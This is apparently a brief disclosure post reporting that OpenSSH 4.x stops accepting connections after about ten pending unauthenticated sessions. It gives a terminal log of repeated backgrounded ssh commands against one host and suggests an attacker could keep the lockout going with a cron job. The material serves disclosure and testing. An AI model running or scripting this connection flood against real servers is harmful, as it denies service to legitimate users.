OpenSSH 4.X deny remote connections.
The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.
To reproduce:
telnet 3.1.33.7 22
Trying 3.1.33.7...
Connected to 3.1.33.7.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7p1 Debian-2
Protocol mismatch.
Connection closed by foreign host.
darkstar# ssh 3.1.33.7
The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established.
RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts.
root@...'s password:
darkstar# ssh 3.1.33.7
darkstar# ssh 3.1.33.7 &
[1] 12945
darkstar# ssh 3.1.33.7 &
[2] 12946
darkstar# ssh 3.1.33.7 &
[3] 12947
darkstar# ssh 3.1.33.7 &
[4] 12948
darkstar# ssh 3.1.33.7 &
[5] 12949
darkstar# ssh 3.1.33.7 &
[6] 12950
darkstar# ssh 3.1.33.7 &
[7] 12951
darkstar# ssh 3.1.33.7 &
[8] 12952
darkstar# ssh 3.1.33.7 &
[9] 12953
darkstar# ssh 3.1.33.7 &
[10] 12954
darkstar# ssh 3.1.33.7 &
[11] 12955
darkstar#
ssh_exchange_identification: Connection closed by remote host
An attacker could cronjob a script to force this condition to remain true.
This will deny anyone else from connecting to the service. Normal behaviour?
Shouts: burnout,spithash princess^pookie, #codemasters
